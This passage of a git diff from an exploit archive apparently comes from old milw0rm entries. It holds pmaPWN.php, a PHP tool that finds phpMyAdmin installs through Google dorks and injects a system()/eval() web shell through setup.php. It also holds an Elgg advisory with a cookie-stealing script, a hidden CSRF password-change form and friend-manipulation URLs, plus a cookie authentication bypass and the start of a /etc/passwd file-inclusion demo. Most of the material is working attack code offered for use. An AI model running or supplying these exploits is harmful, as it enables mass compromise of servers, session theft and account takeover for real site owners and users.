]\n"); - } - FClose($Handlex); - exploit_site($url.$list[$i]); - } - } - for ($i = 0;$i < count($list); $i++)//remove the handles - curl_multi_remove_handle($curlHandle,$curl[$i]); - curl_multi_close($curlHandle); - sleep(5); - } - } - -function addHandle(&$curlHandle,$url) -{ -$cURL = curl_init(); -curl_setopt($cURL, CURLOPT_URL, $url); -curl_setopt($cURL, CURLOPT_HEADER, 0); -curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1); -curl_setopt($cURL, CURLOPT_TIMEOUT, 10); -curl_multi_add_handle($curlHandle,$cURL); -return $cURL; -} -//execute the handle until the flag passed -// to function is greater then 0 -function ExecHandle(&$curlHandle) -{ -$flag=null; -do { -//fetch pages in parallel -curl_multi_exec($curlHandle,$flag); -} while ($flag > 0); -} - -function exploit_site($url) { - $ch = curl_init(); - curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); - curl_setopt($ch, CURLOPT_HEADER, 1); - curl_setopt($ch, CURLOPT_TIMEOUT, 200); - curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php"); - $result = curl_exec($ch); - curl_close($ch); - $ch2 = curl_init(); - curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); - curl_setopt($ch2, CURLOPT_HEADER, 1); - curl_setopt($ch2, CURLOPT_TIMEOUT, 200); - curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php"); - $result2 = curl_exec($ch2); - curl_close($ch2); - //print $url; - if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) { - print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln"; - print "\n[+] Exploiting, wait sec..\n"; - $Handlex = FOpen("pmaPWN.log", "a+"); - FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln"); - FWrite($Handlex, "\n[+] Exploiting, wait sec..\n"); - FClose($Handlex); - exploit($url); - } - else { - $Handlex = FOpen("pmaPWN.log", "a+"); - print "\n[-] Shit! no luck.. not vulnerable\n"; - FWrite($Handlex, "\n[-] Shit! no luck.. 
not vulnerable\n");
- FClose($Handlex);
- }
-}
-
- function exploit($w00t) {
- $Handlex = FOpen("pmaPWN.log", "a+");
- $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
- //first get cookie + token
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
- curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
- curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($curl, CURLOPT_TIMEOUT, 200);
- curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
- curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
- curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
- $result = curl_exec($curl);
- curl_close($curl);
- if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
-
- $token = $matches[1][1];
- if ($token != '') {
- print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
- FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
- $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
- print "\n[+] Sending evil payload mwahaha.. \n";
- FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
- curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
- curl_setopt($curl, CURLOPT_TIMEOUT, 200);
- curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
- curl_setopt($curl, CURLOPT_REFERER, $w00t);
- curl_setopt($curl, CURLOPT_POST, true);
- curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
- curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
- curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
- $result = curl_exec($curl);
- curl_close($curl);
-
- print "\n[!] w00t! w00t! You should now have shell here";
- print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
- print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
- FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
- FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
-
- }
- else {
- print "\n[!] Shit! no luck.. not vulnerable\n";
- FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
- return false;
- }
- FClose($Handlex);
- if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
- //exit();
- }
-
-?>
-
-# milw0rm.com [2009-06-22]
+<?php
+
+$list = array(
+'/phpmyadmin/',
+'/phpMyAdmin/',
+'/PMA/',
+'/pma/',
+'/admin/',
+'/dbadmin/',
+'/mysql/',
+'/myadmin/',
+'/phpmyadmin2/',
+'/phpMyAdmin2/',
+'/phpMyAdmin-2/',
+'/php-my-admin/',
+'/phpMyAdmin-2.2.3/',
+'/phpMyAdmin-2.2.6/',
+'/phpMyAdmin-2.5.1/',
+'/phpMyAdmin-2.5.4/',
+'/phpMyAdmin-2.5.5-rc1/',
+'/phpMyAdmin-2.5.5-rc2/',
+'/phpMyAdmin-2.5.5/',
+'/phpMyAdmin-2.5.5-pl1/',
+'/phpMyAdmin-2.5.6-rc1/',
+'/phpMyAdmin-2.5.6-rc2/',
+'/phpMyAdmin-2.5.6/',
+'/phpMyAdmin-2.5.7/',
+'/phpMyAdmin-2.5.7-pl1/',
+'/phpMyAdmin-2.6.0-alpha/',
+'/phpMyAdmin-2.6.0-alpha2/',
+'/phpMyAdmin-2.6.0-beta1/',
+'/phpMyAdmin-2.6.0-beta2/',
+'/phpMyAdmin-2.6.0-rc1/',
+'/phpMyAdmin-2.6.0-rc2/',
+'/phpMyAdmin-2.6.0-rc3/',
+'/phpMyAdmin-2.6.0/',
+'/phpMyAdmin-2.6.0-pl1/',
+'/phpMyAdmin-2.6.0-pl2/',
+'/phpMyAdmin-2.6.0-pl3/',
+'/phpMyAdmin-2.6.1-rc1/',
+'/phpMyAdmin-2.6.1-rc2/',
+'/phpMyAdmin-2.6.1/',
+'/phpMyAdmin-2.6.1-pl1/',
+'/phpMyAdmin-2.6.1-pl2/',
+'/phpMyAdmin-2.6.1-pl3/',
+'/phpMyAdmin-2.6.2-rc1/',
+'/phpMyAdmin-2.6.2-beta1/',
+'/phpMyAdmin-2.6.2-rc1/',
+'/phpMyAdmin-2.6.2/',
+'/phpMyAdmin-2.6.2-pl1/',
+'/phpMyAdmin-2.6.3/',
+'/phpMyAdmin-2.6.3-rc1/',
+'/phpMyAdmin-2.6.3/',
+'/phpMyAdmin-2.6.3-pl1/',
+'/phpMyAdmin-2.6.4-rc1/',
+'/phpMyAdmin-2.6.4-pl1/',
+'/phpMyAdmin-2.6.4-pl2/',
+'/phpMyAdmin-2.6.4-pl3/',
+'/phpMyAdmin-2.6.4-pl4/',
+'/phpMyAdmin-2.6.4/',
+'/phpMyAdmin-2.7.0-beta1/',
+'/phpMyAdmin-2.7.0-rc1/',
+'/phpMyAdmin-2.7.0-pl1/',
+'/phpMyAdmin-2.7.0-pl2/',
+'/phpMyAdmin-2.7.0/',
+'/phpMyAdmin-2.8.0-beta1/',
+'/phpMyAdmin-2.8.0-rc1/',
+'/phpMyAdmin-2.8.0-rc2/',
+'/phpMyAdmin-2.8.0/',
+'/phpMyAdmin-2.8.0.1/',
+'/phpMyAdmin-2.8.0.2/',
+'/phpMyAdmin-2.8.0.3/',
+'/phpMyAdmin-2.8.0.4/',
+'/phpMyAdmin-2.8.1-rc1/',
+'/phpMyAdmin-2.8.1/',
+'/phpMyAdmin-2.8.2/',
+'/sqlmanager/',
+'/mysqlmanager/',
+'/p/m/a/',
+'/PMA2005/',
+'/pma2005/',
+'/phpmanager/',
+'/php-myadmin/',
+'/phpmy-admin/',
+'/webadmin/',
+'/sqlweb/',
+'/websql/',
+'/webdb/',
+'/mysqladmin/',
+'/mysql-admin/',
+);
+
+if($argc > 1) {
+ print "|****************************************************************|\n";
+ print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
+ print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
+ print " This is PHP version original http://milw0rm.com/exploits/8921\n";
+ print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
+ print " greetz: Hacking Expose!, HM Security, darkc0de\n";
+ print "|****************************************************************|\n";
+ print "\n";
+ print "Usage: php $argv[0] \n";
+ exit;
+}
+
+ print "|****************************************************************|\n";
+ print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
+ print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
+ print " This is PHP version original http://milw0rm.com/exploits/8921\n";
+ print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
+ print " greetz: Hacking Expose!, HM Security, darkc0de\n";
+ print "|****************************************************************|\n";
+ print "\n";
+ $Handlex = FOpen("pmaPWN.log", "a+");
+ FWrite($Handlex, "|****************************************************************|\n");
+ FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
+ FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
+ FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
+ FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
+ FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
+ FWrite($Handlex, "|****************************************************************|\n\n");
+ print "[-] Master, where you want to go today? \n";
+ print "[-] example dork: intitle:phpMyAdmin \n";
+ fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
+ $dork = trim(fgets(STDIN));
+ print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
+ FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
+ for($i = 0; $i <= 900; $i+=100) {
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+ curl_setopt($ch, CURLOPT_TIMEOUT, 200);
+ curl_setopt($ch, CURLOPT_HEADER, 1);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
+ curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
+ $pg = curl_exec($ch);
+ curl_close($ch);
+
+ if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
+ }
+
+ foreach($res as $key) {
+ foreach($key as $target) {
+ $total++;
+ }
+ }
+ print "[+] Done. $total rows return.\n";
+ FWrite($Handlex, "[+] Done. $total rows return.\n");
+ FClose($Handlex);
+ foreach($res as $key) {
+ foreach($key as $target) {
+ $Handlex = FOpen("pmaPWN.log", "a+");
+ $real = parse_url($target);
+ $url = "http://".$real['host'];
+ print "\n[-] Scanning phpMyAdmin on ".$url."\n";
+ FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
+ FClose($Handlex);
+ sleep(5);
+ $curlHandle = curl_multi_init();
+ for ($i = 0;$i < count($list); $i++)
+ $curl[$i] = addHandle($curlHandle,$url.$list[$i]);
+ ExecHandle($curlHandle);
+ for ($i = 0;$i < count($list); $i++)
+ {
+ $text[$i] = curl_multi_getcontent ($curl[$i]);
+ //echo $url.$list[$i]."\n";
+ $Handlex = FOpen("pmaPWN.log", "a+");
+ if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
+ print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
+ print "\n[+] Testing vulnerable, wait sec..\n";
+ FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
+ FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
+ if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
+ print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
+ FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
+ }
+ FClose($Handlex);
+ exploit_site($url.$list[$i]);
+ }
+ }
+ for ($i = 0;$i < count($list); $i++)//remove the handles
+ curl_multi_remove_handle($curlHandle,$curl[$i]);
+ curl_multi_close($curlHandle);
+ sleep(5);
+ }
+ }
+
+function addHandle(&$curlHandle,$url)
+{
+$cURL = curl_init();
+curl_setopt($cURL, CURLOPT_URL, $url);
+curl_setopt($cURL, CURLOPT_HEADER, 0);
+curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
+curl_multi_add_handle($curlHandle,$cURL);
+return $cURL;
+}
+//execute the handle until the flag passed
+// to function is greater then 0
+function ExecHandle(&$curlHandle)
+{
+$flag=null;
+do {
+//fetch pages in parallel
+curl_multi_exec($curlHandle,$flag);
+} while ($flag > 0);
+}
+
+function exploit_site($url) {
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_HEADER, 1);
+ curl_setopt($ch, CURLOPT_TIMEOUT, 200);
+ curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
+ $result = curl_exec($ch);
+ curl_close($ch);
+ $ch2 = curl_init();
+ curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch2, CURLOPT_HEADER, 1);
+ curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
+ curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
+ $result2 = curl_exec($ch2);
+ curl_close($ch2);
+ //print $url;
+ if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
+ print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
+ print "\n[+] Exploiting, wait sec..\n";
+ $Handlex = FOpen("pmaPWN.log", "a+");
+ FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
+ FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
+ FClose($Handlex);
+ exploit($url);
+ }
+ else {
+ $Handlex = FOpen("pmaPWN.log", "a+");
+ print "\n[-] Shit! no luck.. not vulnerable\n";
+ FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
+ FClose($Handlex);
+ }
+}
+
+ function exploit($w00t) {
+ $Handlex = FOpen("pmaPWN.log", "a+");
+ $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
+ //first get cookie + token
+ $curl = curl_init();
+ curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
+ curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
+ curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
+ curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($curl, CURLOPT_TIMEOUT, 200);
+ curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
+ curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
+ curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
+ curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
+ curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
+ $result = curl_exec($curl);
+ curl_close($curl);
+ if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
+
+ $token = $matches[1][1];
+ if ($token != '') {
+ print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
+ FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
+ $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
+ print "\n[+] Sending evil payload mwahaha.. \n";
+ FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
+ $curl = curl_init();
+ curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
+ curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
+ curl_setopt($curl, CURLOPT_TIMEOUT, 200);
+ curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
+ curl_setopt($curl, CURLOPT_REFERER, $w00t);
+ curl_setopt($curl, CURLOPT_POST, true);
+ curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
+ curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
+ curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
+ curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
+ curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
+ $result = curl_exec($curl);
+ curl_close($curl);
+
+ print "\n[!] w00t! w00t! You should now have shell here";
+ print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
+ print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
+ FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
+ FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
+
+ }
+ else {
+ print "\n[!] Shit! no luck.. not vulnerable\n";
+ FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
+ return false;
+ }
+ FClose($Handlex);
+ if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
+ //exit();
+ }
+
+?>
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8993.txt b/platforms/php/webapps/8993.txt
index 4ff1f16b4..6d1cfffdf 100755
--- a/platforms/php/webapps/8993.txt
+++ b/platforms/php/webapps/8993.txt
@@ -1,107 +1,107 @@
-###################################################################################
-[+] CMS Elgg <1.00 (XSS;CSRF;Cambia Password)Multiple Remote Vulnerabilities
-[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
-[+] Vendor:http://elgg.org/
-[+] Greetings: Project MEMI-Bolivia, OpTix, RTM security Group http://zonartm.og
-###################################################################################
-
-Change Password Remotely:
-+++++++++++++++++++++++++
-1) You Must Register In ThE site.
-2) Login
-3) Create a new topic and then edit
- http://www.sitiosocial.com/_templates/
-
-Edit the new topic (Template) have the option to insert HTML, JavaScript
-##################################################################################
-Exploit& HTML Injection
-
-###Cookie Grabber####
-[+] Discovered By ThE Lorddemon
-[+] Vendor:http://elgg.org/
-##################################################################################
-PoC
---
-Script to store cookies
- <?php
- $cookie = $_GET['cookie'];
- $log = fopen("log.txt", "a");
- fwrite($log, $cookie ."\n");
- fclose($log);
- ?>
-uploading to a host.Save as cookie.php
-
-[+]Exploit:
- -------
-1) Register in The SIte
-2) add to the Template
-<script language='Javascript' src='http://localhost/cookie.php?cookie='+document.cooke></script>
-
-The victim would be anyone who comes to your blog.
-
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-###Change Pasword####
-[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
-[+] http://zonartm.org
-[+] Vendor:http://elgg.org/
-#######################################################################################################
-
-1) Register in The SIte
-2) add to the Template
-
-<body onload="document.forms.g.submit();">
-
-<iframe name="my_frame" ALING="BOTTOM" scrolling=no width=1 heigth=1></iframe>
-
-<form method="POST" target="my_frame" action="http://www.sitiosocial.com/_userdetails/index.php" name="g" id="g">
-<input type=hidden name="name" value="">
-<input type=hidden name="email" value="">
-<input type=hidden name="moderation" value="no">
-<input type=hidden name="publiccoments" value="no">
-<input type=hidden name="receivenotifications" value="no">
-<input type=hidden name="password1" value="password"> <------ Eye with this
-<input type=hidden name="password2" value="password"> <------ Eye with this
-<input type=hidden name="flag[commentwall_access]" value="LOGGED_IN">
-<input type=hidden name="lang" value="">
-<input type=hidden name="flag[sidebarsidebar-profile]" value="yes">
-<input type=hidden name="flag[sidebarsidebar-communities]" value="yes">
-<input type=hidden name="flag[sidebarsidebar-blog]" value="yes">
-<input type=hidden name="flag[sidebarsidebar-friends]" value="yes">
-<input type=hidden name="visualeditor" value="yes">
-<input type=hidden name="action" value="userdetails:update">
-<input type=hidden name="id" value="id_victima"> <---------Eye with this
-<input type=hidden name="profile_id" value="id_victima"> <---------Eye with this
-</form>
-
-It is better to send all the form inside a Div tag to pass unnoticed
-
-The victim would be the user with the id.
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-###You Be More Popular, or remove the victim to Friends####
-[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
-[+] http://zonartm.org
-[+] Vendor:http://elgg.org/
-#################################################################################################################
-
-1) Register in The SIte
-2) Add to the Template
-
-http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=friend&friend_id=[tu id]
-
-viewing parameters from the viewpoint of the attacker.
-
-Friends_name=is the user name who made you want to be your friend. (may be empty)
-Action= friend or unfriend.
-Friend_id=User ID. who is performing the action
-
-You can also remove it with friends cuanquier user.
-
-http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=Unfriend&friend_id=[id_victima]
-
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-# milw0rm.com [2009-06-22]
+###################################################################################
+[+] CMS Elgg <1.00 (XSS;CSRF;Cambia Password)Multiple Remote Vulnerabilities
+[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
+[+] Vendor:http://elgg.org/
+[+] Greetings: Project MEMI-Bolivia, OpTix, RTM security Group http://zonartm.og
+###################################################################################
+
+Change Password Remotely:
++++++++++++++++++++++++++
+1) You Must Register In ThE site.
+2) Login
+3) Create a new topic and then edit
+ http://www.sitiosocial.com/_templates/
+
+Edit the new topic (Template) have the option to insert HTML, JavaScript
+##################################################################################
+Exploit& HTML Injection
+
+###Cookie Grabber####
+[+] Discovered By ThE Lorddemon
+[+] Vendor:http://elgg.org/
+##################################################################################
+PoC
+--
+Script to store cookies
+ <?php
+ $cookie = $_GET['cookie'];
+ $log = fopen("log.txt", "a");
+ fwrite($log, $cookie ."\n");
+ fclose($log);
+ ?>
+uploading to a host.Save as cookie.php
+
+[+]Exploit:
+ -------
+1) Register in The SIte
+2) add to the Template
+<script language='Javascript' src='http://localhost/cookie.php?cookie='+document.cooke></script>
+
+The victim would be anyone who comes to your blog.
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+###Change Pasword####
+[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
+[+] http://zonartm.org
+[+] Vendor:http://elgg.org/
+#######################################################################################################
+
+1) Register in The SIte
+2) add to the Template
+
+<body onload="document.forms.g.submit();">
+
+<iframe name="my_frame" ALING="BOTTOM" scrolling=no width=1 heigth=1></iframe>
+
+<form method="POST" target="my_frame" action="http://www.sitiosocial.com/_userdetails/index.php" name="g" id="g">
+<input type=hidden name="name" value="">
+<input type=hidden name="email" value="">
+<input type=hidden name="moderation" value="no">
+<input type=hidden name="publiccoments" value="no">
+<input type=hidden name="receivenotifications" value="no">
+<input type=hidden name="password1" value="password"> <------ Eye with this
+<input type=hidden name="password2" value="password"> <------ Eye with this
+<input type=hidden name="flag[commentwall_access]" value="LOGGED_IN">
+<input type=hidden name="lang" value="">
+<input type=hidden name="flag[sidebarsidebar-profile]" value="yes">
+<input type=hidden name="flag[sidebarsidebar-communities]" value="yes">
+<input type=hidden name="flag[sidebarsidebar-blog]" value="yes">
+<input type=hidden name="flag[sidebarsidebar-friends]" value="yes">
+<input type=hidden name="visualeditor" value="yes">
+<input type=hidden name="action" value="userdetails:update">
+<input type=hidden name="id" value="id_victima"> <---------Eye with this
+<input type=hidden name="profile_id" value="id_victima"> <---------Eye with this
+</form>
+
+It is better to send all the form inside a Div tag to pass unnoticed
+
+The victim would be the user with the id.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+###You Be More Popular, or remove the victim to Friends####
+[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
+[+] http://zonartm.org
+[+] Vendor:http://elgg.org/
+#################################################################################################################
+
+1) Register in The SIte
+2) Add to the Template
+
+http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=friend&friend_id=[tu id]
+
+viewing parameters from the viewpoint of the attacker.
+
+Friends_name=is the user name who made you want to be your friend. (may be empty)
+Action= friend or unfriend.
+Friend_id=User ID. who is performing the action
+
+You can also remove it with friends cuanquier user.
+
+http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=Unfriend&friend_id=[id_victima]
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8994.txt b/platforms/php/webapps/8994.txt
index 3a5ec1e30..4b31332e5 100755
--- a/platforms/php/webapps/8994.txt
+++ b/platforms/php/webapps/8994.txt
@@ -1,14 +1,14 @@
-#################################################################################################################
-[+] AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure
-[+] Discovered By TiGeR-Dz
-#################################################################################################################
-Cookie Insecure
-+++++++++++++++++++++++++
-javascript:document.cookie="awse_logged=1;path=/";
-Demo
-----
-http://www.awscripts.com/demo_se/awse/awse_admin/index.php
-################################################################################################################
-
-
-# milw0rm.com [2009-06-22]
+#################################################################################################################
+[+] AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure
+[+] Discovered By TiGeR-Dz
+#################################################################################################################
+Cookie Insecure
++++++++++++++++++++++++++
+javascript:document.cookie="awse_logged=1;path=/";
+Demo
+----
+http://www.awscripts.com/demo_se/awse/awse_admin/index.php
+################################################################################################################
+
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8996.txt b/platforms/php/webapps/8996.txt
index 1a81fde18..8581c42d7 100755
--- a/platforms/php/webapps/8996.txt
+++ b/platforms/php/webapps/8996.txt
@@ -1,18 +1,18 @@
-==================================================================
-=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
-==================================================================
-
-Vendor:http://www.gravy-media.com/
-Download:register to download
-Dork:"Powered by Gravy Media"
-Discovered By:Lo$er
-
-====Vulnerable code(forcedownload.php)====
-27. $filename = $_GET['file'];
-
-70. readfile("$filename");
-====Demo====
-
-http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
-
-# milw0rm.com [2009-06-22]
+==================================================================
+=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
+==================================================================
+
